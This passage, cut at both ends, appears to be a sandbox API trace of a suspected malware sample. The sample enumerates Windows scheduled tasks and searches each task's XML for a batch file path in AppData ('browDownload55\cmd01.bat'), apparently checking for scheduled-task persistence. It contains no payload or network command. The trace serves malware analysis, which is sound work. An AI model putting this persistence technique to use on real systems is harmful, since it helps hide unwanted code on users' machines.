{BF5CB148-7C77-4D8A-A53E-D81C70CF743C}\r\n \r\n \r\n") returned 0x0 [0162.305] StrStrIW (lpFirst="\r\n\r\n \r\n 2006-11-10T14:29:55.5851926\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6001)\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6003)\r\n \\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Manual)\r\n \r\n \r\n \r\n S-1-1-0\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n PT1H\r\n Parallel\r\n true\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n false\r\n PT1H\r\n \r\n \r\n \r\n \r\n {BF5CB148-7C77-4D8A-A53E-D81C70CF743C}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.305] IUnknown:Release (This=0x929690) returned 0x0 [0162.305] IUnknown:Release (This=0x9294c0) returned 0x0 [0162.305] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x9294c0) returned 0x0 [0162.305] ITaskFolderCollection:get_Count (in: This=0x9294c0, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.305] IUnknown:Release (This=0x9294c0) returned 0x0 [0162.305] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.305] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.305] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929460) returned 0x0 [0162.306] IRegisteredTaskCollection:get_Count (in: This=0x929460, pCount=0xce048 | out: pCount=0xce048*=4) returned 0x0 [0162.306] IRegisteredTaskCollection:get_Item (in: This=0x929460, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295e0) returned 0x0 [0162.306] IRegisteredTask:get_Name (in: This=0x9295e0, pName=0xce058 | out: pName=0xce058*="EDP Policy Manager") returned 0x0 [0162.306] IRegisteredTask:get_Xml (in: This=0x9295e0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 2015-02-09T10:54:13.9629482\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;S-1-5-87-2978287140-3787137133-1749738600-1988163579-2060695581)\r\n $(@%SystemRoot%\\system32\\ApplockerCsp.dll,-101)\r\n $(@%SystemRoot%\\system32\\ApplockerCsp.dll,-100)\r\n $(@%SystemRoot%\\system32\\ApplockerCsp.dll,-102)\r\n \\Microsoft\\Windows\\AppID\\EDP Policy Manager\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT0S\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7588BCA328009213\r\n \r\n \r\n 75E0BCA328009213\r\n \r\n \r\n \r\n \r\n {DECA92E0-AF85-439E-9204-86679978DA08}\r\n \r\n \r\n \r\n") returned 0x0 [0162.307] StrStrIW (lpFirst="\r\n\r\n \r\n 2015-02-09T10:54:13.9629482\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;S-1-5-87-2978287140-3787137133-1749738600-1988163579-2060695581)\r\n $(@%SystemRoot%\\system32\\ApplockerCsp.dll,-101)\r\n $(@%SystemRoot%\\system32\\ApplockerCsp.dll,-100)\r\n $(@%SystemRoot%\\system32\\ApplockerCsp.dll,-102)\r\n \\Microsoft\\Windows\\AppID\\EDP Policy Manager\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT0S\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7588BCA328009213\r\n \r\n \r\n 75E0BCA328009213\r\n \r\n \r\n \r\n \r\n {DECA92E0-AF85-439E-9204-86679978DA08}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.307] IUnknown:Release (This=0x9295e0) returned 0x0 [0162.307] IRegisteredTaskCollection:get_Item (in: This=0x929460, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295e0) returned 0x0 [0162.307] IRegisteredTask:get_Name (in: This=0x9295e0, pName=0xce058 | out: pName=0xce058*="PolicyConverter") returned 0x0 [0162.307] IRegisteredTask:get_Xml (in: This=0x9295e0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-300)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-301)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-302)\r\n \\Microsoft\\Windows\\AppID\\PolicyConverter\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n Queue\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\appidpolicyconverter.exe\r\n \r\n \r\n") returned 0x0 [0162.308] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-300)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-301)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-302)\r\n \\Microsoft\\Windows\\AppID\\PolicyConverter\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n Queue\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\appidpolicyconverter.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.308] IUnknown:Release (This=0x9295e0) returned 0x0 [0162.308] IRegisteredTaskCollection:get_Item (in: This=0x929460, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295e0) returned 0x0 [0162.308] IRegisteredTask:get_Name (in: This=0x9295e0, pName=0xce058 | out: pName=0xce058*="SmartScreenSpecific") returned 0x0 [0162.308] IRegisteredTask:get_Xml (in: This=0x9295e0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FRFX;;;AU)\r\n $(@%systemroot%\\system32\\apprepsync.dll,-701)\r\n $(@%systemroot%\\system32\\apprepsync.dll,-700)\r\n $(@%systemroot%\\system32\\apprepsync.dll,-702)\r\n \\Microsoft\\Windows\\AppID\\SmartScreenSpecific\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n Parallel\r\n true\r\n true\r\n \r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P1M\r\n \r\n \r\n \r\n \r\n PT30M\r\n \r\n \r\n \r\n \r\n {9F2B0085-9218-42A1-88B0-9F0E65851666}\r\n \r\n \r\n \r\n") returned 0x0 [0162.309] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FRFX;;;AU)\r\n $(@%systemroot%\\system32\\apprepsync.dll,-701)\r\n $(@%systemroot%\\system32\\apprepsync.dll,-700)\r\n $(@%systemroot%\\system32\\apprepsync.dll,-702)\r\n \\Microsoft\\Windows\\AppID\\SmartScreenSpecific\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n Parallel\r\n true\r\n true\r\n \r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P1M\r\n \r\n \r\n \r\n \r\n PT30M\r\n \r\n \r\n \r\n \r\n {9F2B0085-9218-42A1-88B0-9F0E65851666}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.309] IUnknown:Release (This=0x9295e0) returned 0x0 [0162.309] IRegisteredTaskCollection:get_Item (in: This=0x929460, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295e0) returned 0x0 [0162.309] IRegisteredTask:get_Name (in: This=0x9295e0, pName=0xce058 | out: pName=0xce058*="VerifiedPublisherCertStoreCheck") returned 0x0 [0162.309] IRegisteredTask:get_Xml (in: This=0x9295e0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-200)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-201)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-202)\r\n \\Microsoft\\Windows\\AppID\\VerifiedPublisherCertStoreCheck\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n Queue\r\n 10\r\n true\r\n true\r\n \r\n PT3M\r\n PT23H\r\n true\r\n true\r\n \r\n true\r\n \r\n \r\n \r\n PT30M\r\n \r\n P1D\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\appidcertstorecheck.exe\r\n \r\n \r\n") returned 0x0 [0162.310] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-200)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-201)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-202)\r\n \\Microsoft\\Windows\\AppID\\VerifiedPublisherCertStoreCheck\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n Queue\r\n 10\r\n true\r\n true\r\n \r\n PT3M\r\n PT23H\r\n true\r\n true\r\n \r\n true\r\n \r\n \r\n \r\n PT30M\r\n \r\n P1D\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\appidcertstorecheck.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.310] IUnknown:Release (This=0x9295e0) returned 0x0 [0162.310] IUnknown:Release (This=0x929460) returned 0x0 [0162.310] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929460) returned 0x0 [0162.310] ITaskFolderCollection:get_Count (in: This=0x929460, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.310] IUnknown:Release (This=0x929460) returned 0x0 [0162.310] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.310] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.310] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929480) returned 0x0 [0162.311] IRegisteredTaskCollection:get_Count (in: This=0x929480, pCount=0xce048 | out: pCount=0xce048*=3) returned 0x0 [0162.311] IRegisteredTaskCollection:get_Item (in: This=0x929480, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929620) returned 0x0 [0162.311] IRegisteredTask:get_Name (in: This=0x929620, pName=0xce058 | out: pName=0xce058*="Microsoft Compatibility Appraiser") returned 0x0 [0162.311] IRegisteredTask:get_Xml (in: This=0x929620, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\appraiser.dll,-500)\r\n $(@%SystemRoot%\\system32\\appraiser.dll,-501)\r\n $(@%SystemRoot%\\system32\\appraiser.dll,-502)\r\n \\Microsoft\\Windows\\Application Experience\\Microsoft Compatibility Appraiser\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n P4D\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2008-09-01T03:00:00\r\n \r\n P1D\r\n \r\n PT2H\r\n \r\n \r\n 750CBCA3290B9641\r\n 01\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\compattelrunner.exe\r\n \r\n \r\n") returned 0x0 [0162.312] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\appraiser.dll,-500)\r\n $(@%SystemRoot%\\system32\\appraiser.dll,-501)\r\n $(@%SystemRoot%\\system32\\appraiser.dll,-502)\r\n \\Microsoft\\Windows\\Application Experience\\Microsoft Compatibility Appraiser\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n P4D\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2008-09-01T03:00:00\r\n \r\n P1D\r\n \r\n PT2H\r\n \r\n \r\n 750CBCA3290B9641\r\n 01\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\compattelrunner.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.313] IUnknown:Release (This=0x929620) returned 0x0 [0162.313] IRegisteredTaskCollection:get_Item (in: This=0x929480, index=0xce098*(varType=0x3, wReserved1=0x7f, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929620) returned 0x0 [0162.313] IRegisteredTask:get_Name (in: This=0x929620, pName=0xce058 | out: pName=0xce058*="ProgramDataUpdater") returned 0x0 [0162.313] IRegisteredTask:get_Xml (in: This=0x929620, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\invagent.dll,-701)\r\n $(@%SystemRoot%\\system32\\invagent.dll,-701)\r\n $(@%SystemRoot%\\system32\\invagent.dll,-702)\r\n \\Microsoft\\Windows\\Application Experience\\ProgramDataUpdater\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n IgnoreNew\r\n 4\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P1DT12H\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\compattelrunner.exe\r\n -maintenance\r\n \r\n \r\n") returned 0x0 [0162.313] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\invagent.dll,-701)\r\n $(@%SystemRoot%\\system32\\invagent.dll,-701)\r\n $(@%SystemRoot%\\system32\\invagent.dll,-702)\r\n \\Microsoft\\Windows\\Application Experience\\ProgramDataUpdater\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n IgnoreNew\r\n 4\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P1DT12H\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\compattelrunner.exe\r\n -maintenance\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.314] IUnknown:Release (This=0x929620) returned 0x0 [0162.314] IRegisteredTaskCollection:get_Item (in: This=0x929480, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929620) returned 0x0 [0162.314] IRegisteredTask:get_Name (in: This=0x929620, pName=0xce058 | out: pName=0xce058*="StartupAppTask") returned 0x0 [0162.314] IRegisteredTask:get_Xml (in: This=0x929620, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;LA)(A;OICI;FA;;;SY)(A;OICI;FRFX;;;AU)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\Startupscan.dll,-701)\r\n $(@%SystemRoot%\\system32\\Startupscan.dll,-701)\r\n $(@%SystemRoot%\\system32\\Startupscan.dll,-702)\r\n \\Microsoft\\Windows\\Application Experience\\StartupAppTask\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n Parallel\r\n 4\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P2D\r\n P3D\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n Startupscan.dll,SusRunTask\r\n \r\n \r\n") returned 0x0 [0162.314] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;LA)(A;OICI;FA;;;SY)(A;OICI;FRFX;;;AU)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\Startupscan.dll,-701)\r\n $(@%SystemRoot%\\system32\\Startupscan.dll,-701)\r\n $(@%SystemRoot%\\system32\\Startupscan.dll,-702)\r\n \\Microsoft\\Windows\\Application Experience\\StartupAppTask\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n Parallel\r\n 4\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P2D\r\n P3D\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n Startupscan.dll,SusRunTask\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.315] IUnknown:Release (This=0x929620) returned 0x0 [0162.315] IUnknown:Release (This=0x929480) returned 0x0 [0162.315] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929480) returned 0x0 [0162.315] ITaskFolderCollection:get_Count (in: This=0x929480, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.315] IUnknown:Release (This=0x929480) returned 0x0 [0162.315] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.315] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x5, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.315] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929470) returned 0x0 [0162.316] IRegisteredTaskCollection:get_Count (in: This=0x929470, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0162.316] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929600) returned 0x0 [0162.316] IRegisteredTask:get_Name (in: This=0x929600, pName=0xce058 | out: pName=0xce058*="CleanupTemporaryState") returned 0x0 [0162.316] IRegisteredTask:get_Xml (in: This=0x929600, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FRFX;;;BA)(A;;FA;;;SY)\r\n $(@%systemroot%\\system32\\Windows.Storage.ApplicationData.dll,-5001)\r\n $(@%systemroot%\\system32\\Windows.Storage.ApplicationData.dll,-5002)\r\n $(@%systemroot%\\system32\\Windows.Storage.ApplicationData.dll,-5003)\r\n \\Microsoft\\Windows\\ApplicationData\\CleanupTemporaryState\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P1M\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n Windows.Storage.ApplicationData.dll,CleanupTemporaryState\r\n \r\n \r\n") returned 0x0 [0162.316] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FRFX;;;BA)(A;;FA;;;SY)\r\n $(@%systemroot%\\system32\\Windows.Storage.ApplicationData.dll,-5001)\r\n $(@%systemroot%\\system32\\Windows.Storage.ApplicationData.dll,-5002)\r\n $(@%systemroot%\\system32\\Windows.Storage.ApplicationData.dll,-5003)\r\n \\Microsoft\\Windows\\ApplicationData\\CleanupTemporaryState\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P1M\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n Windows.Storage.ApplicationData.dll,CleanupTemporaryState\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.317] IUnknown:Release (This=0x929600) returned 0x0 [0162.317] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929600) returned 0x0 [0162.317] IRegisteredTask:get_Name (in: This=0x929600, pName=0xce058 | out: pName=0xce058*="DsSvcCleanup") returned 0x0 [0162.317] IRegisteredTask:get_Xml (in: This=0x929600, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FRFX;;;BA)(A;;FA;;;SY)\r\n $(@%systemroot%\\system32\\dssvc.dll,-10005)\r\n $(@%systemroot%\\system32\\dssvc.dll,-10004)\r\n $(@%systemroot%\\system32\\dssvc.dll,-10006)\r\n \\Microsoft\\Windows\\ApplicationData\\DsSvcCleanup\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P1M\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\dstokenclean.exe\r\n \r\n \r\n") returned 0x0 [0162.317] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FRFX;;;BA)(A;;FA;;;SY)\r\n $(@%systemroot%\\system32\\dssvc.dll,-10005)\r\n $(@%systemroot%\\system32\\dssvc.dll,-10004)\r\n $(@%systemroot%\\system32\\dssvc.dll,-10006)\r\n \\Microsoft\\Windows\\ApplicationData\\DsSvcCleanup\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P1M\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\dstokenclean.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.317] IUnknown:Release (This=0x929600) returned 0x0 [0162.317] IUnknown:Release (This=0x929470) returned 0x0 [0162.318] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929470) returned 0x0 [0162.318] ITaskFolderCollection:get_Count (in: This=0x929470, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.318] IUnknown:Release (This=0x929470) returned 0x0 [0162.318] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.318] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x6, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.318] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929480) returned 0x0 [0162.318] IRegisteredTaskCollection:get_Count (in: This=0x929480, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.318] IRegisteredTaskCollection:get_Item (in: This=0x929480, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929610) returned 0x0 [0162.318] IRegisteredTask:get_Name (in: This=0x929610, pName=0xce058 | out: pName=0xce058*="Pre-staged app cleanup") returned 0x0 [0162.318] IRegisteredTask:get_Xml (in: This=0x929610, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;GA;;;SY)(A;;FRFX;;;LS)(A;;FA;;;BA)\r\n \\Microsoft\\Windows\\AppxDeploymentClient\\Pre-staged app cleanup\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n false\r\n PT0S\r\n true\r\n IgnoreNew\r\n true\r\n \r\n PT15M\r\n false\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P7D\r\n \r\n \r\n \r\n \r\n PT1H\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n %windir%\\system32\\AppxDeploymentClient.dll,AppxPreStageCleanupRunTask\r\n \r\n \r\n") returned 0x0 [0162.319] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;GA;;;SY)(A;;FRFX;;;LS)(A;;FA;;;BA)\r\n \\Microsoft\\Windows\\AppxDeploymentClient\\Pre-staged app cleanup\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n false\r\n PT0S\r\n true\r\n IgnoreNew\r\n true\r\n \r\n PT15M\r\n false\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P7D\r\n \r\n \r\n \r\n \r\n PT1H\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n %windir%\\system32\\AppxDeploymentClient.dll,AppxPreStageCleanupRunTask\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.319] IUnknown:Release (This=0x929610) returned 0x0 [0162.319] IUnknown:Release (This=0x929480) returned 0x0 [0162.319] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929480) returned 0x0 [0162.320] ITaskFolderCollection:get_Count (in: This=0x929480, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.320] IUnknown:Release (This=0x929480) returned 0x0 [0162.320] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.320] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.320] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929460) returned 0x0 [0162.320] IRegisteredTaskCollection:get_Count (in: This=0x929460, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.320] IRegisteredTaskCollection:get_Item (in: This=0x929460, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295e0) returned 0x0 [0162.320] IRegisteredTask:get_Name (in: This=0x9295e0, pName=0xce058 | out: pName=0xce058*="Proxy") returned 0x0 [0162.320] IRegisteredTask:get_Xml (in: This=0x9295e0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 